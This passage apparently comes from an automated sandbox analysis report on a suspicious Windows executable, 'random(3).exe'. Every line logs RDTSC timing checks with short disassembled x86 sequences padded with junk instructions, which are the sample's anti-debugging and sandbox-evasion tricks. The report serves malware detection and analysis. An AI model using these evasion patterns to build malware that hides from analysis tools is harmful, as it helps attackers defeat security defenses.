      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A26D5A second address: A26D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A26D5E second address: A26D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2E9F4 second address: A2E9FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2E9FE second address: A2EA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D0Dh 0x00000009 pop edx 0x0000000a jng 00007F9984B08D0Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2EA18 second address: A2EA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F998484EB17h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F998484EB0Eh 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2EA46 second address: A2EA56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2EA56 second address: A2EA68 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F998484EB0Ch 0x00000008 jc 00007F998484EB06h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2EA68 second address: A2EA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A30043 second address: A3006A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F998484EB06h 0x00000008 jbe 00007F998484EB06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jl 00007F998484EB06h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d pushad 0x0000001e jno 00007F998484EB06h 0x00000024 push eax 0x00000025 pop eax 0x00000026 popad 0x00000027 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A33E46 second address: A33E55 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9984B08D06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A34105 second address: A34109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A34109 second address: A34118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F9984B08D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A34118 second address: A34120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A34120 second address: A3413A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jns 00007F9984B08D06h 0x0000000e jnc 00007F9984B08D06h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A38900 second address: A38926 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b jl 00007F998484EB0Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A38926 second address: A38935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A38935 second address: A3893B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A38B40 second address: A38B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F9984B08D0Ch 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A38B59 second address: A38B87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F998484EB10h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push esi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A38B87 second address: A38BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D0Ch 0x00000009 popad 0x0000000a pop esi 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F9984B08D08h 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3D678 second address: A3D68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 ja 00007F998484EB12h 0x0000000d jnl 00007F998484EB06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3D68D second address: A3D691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DD6D second address: A3DD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DD75 second address: A3DD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9984B08D0Eh 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DD8A second address: A3DDA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB16h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DDA6 second address: A3DDCD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9984B08D08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F9984B08D16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DDCD second address: A3DDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F998484EB14h 0x00000009 popad 0x0000000a jmp 00007F998484EB10h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DF5D second address: A3DF61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DF61 second address: A3DF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F998484EB10h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DF79 second address: A3DF97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F9984B08D0Dh 0x0000000e je 00007F9984B08D06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3E3A1 second address: A3E3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jp 00007F998484EB1Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F998484EB06h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3E3CD second address: A3E417 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9984B08D06h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 jbe 00007F9984B08D06h 0x0000001e jmp 00007F9984B08D0Eh 0x00000023 pop esi 0x00000024 jng 00007F9984B08D1Dh 0x0000002a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3E7CC second address: A3E7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F998484EB0Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F998484EB06h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4310B second address: A4311F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F9984B08D0Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4311F second address: A43123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A42AB4 second address: A42ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9984B08D06h 0x0000000a jmp 00007F9984B08D0Dh 0x0000000f popad 0x00000010 jp 00007F9984B08D0Eh 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A42ADA second address: A42AF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F998484EB12h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A42AF0 second address: A42B16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F9984B08D18h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A42B16 second address: A42B1B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A43917 second address: A43936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9984B08D06h 0x0000000a jmp 00007F9984B08D13h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A43936 second address: A4393B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4393B second address: A43954 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D12h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A43954 second address: A4395A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4395A second address: A43968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A43968 second address: A4396C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4396C second address: A43972 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A43AB6 second address: A43B13 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F998484EB16h 0x00000008 jmp 00007F998484EB0Ah 0x0000000d jnl 00007F998484EB06h 0x00000013 jmp 00007F998484EB15h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F998484EB17h 0x00000024 jmp 00007F998484EB0Bh 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c push esi 0x0000002d pop esi 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A43B13 second address: A43B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A43B17 second address: A43B1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A43B1D second address: A43B27 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9984B08D0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A08C8D second address: A08C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A08C91 second address: A08C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A08C95 second address: A08C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A08C9B second address: A08CB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F9984B08D08h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A08F0A second address: A08F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F998484EB13h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A08F2C second address: A08F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A08F3D second address: A08F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A08F42 second address: A08F6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F9984B08D06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 jmp 00007F9984B08D0Ah 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b ja 00007F9984B08D0Ch 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A09133 second address: A0913D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0913D second address: A09176 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 jc 00007F9984B08D0Ch 0x0000000f jnp 00007F9984B08D06h 0x00000015 pop esi 0x00000016 nop 0x00000017 jng 00007F9984B08D0Ch 0x0000001d mov dword ptr [ebp+122D383Ch], edi 0x00000023 push 00000004h 0x00000025 mov cl, 69h 0x00000027 nop 0x00000028 pushad 0x00000029 jne 00007F9984B08D0Ch 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A09176 second address: A0917A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0917A second address: A0918E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9984B08D0Ah 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0918E second address: A09198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F998484EB06h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A094BD second address: A094C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A095A9 second address: A095B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A095B0 second address: A095D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F9984B08D12h 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A095D5 second address: A095DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A097BA second address: A097C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F132C second address: 9F1347 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F998484EB16h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F1347 second address: 9F1378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D0Dh 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007F9984B08D19h 0x00000014 pop edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9C1511 second address: 9C1532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007F998484EB16h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9C1532 second address: 9C1536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A48A06 second address: A48A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F998484EB06h 0x0000000a popad 0x0000000b ja 00007F998484EB1Ah 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A48CD7 second address: A48CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A48F76 second address: A48F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A48F7A second address: A48F8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9984B08D0Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A490E7 second address: A490F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F998484EB06h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4F1D6 second address: A4F1F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4F1F7 second address: A4F206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 jl 00007F998484EB08h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4F206 second address: A4F221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9984B08D14h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4F221 second address: A4F23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F998484EB13h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9C4B70 second address: 9C4B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F9984B08D06h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9C4B7D second address: 9C4B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4DC70 second address: A4DC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F9984B08D0Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4E080 second address: A4E097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F998484EB0Fh 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4E097 second address: A4E0AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9984B08D12h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4E681 second address: A4E691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4E691 second address: A4E6AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D14h 0x00000007 jnc 00007F9984B08D06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4E817 second address: A4E81D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A4D93A second address: A4D93F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A56839 second address: A5683D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
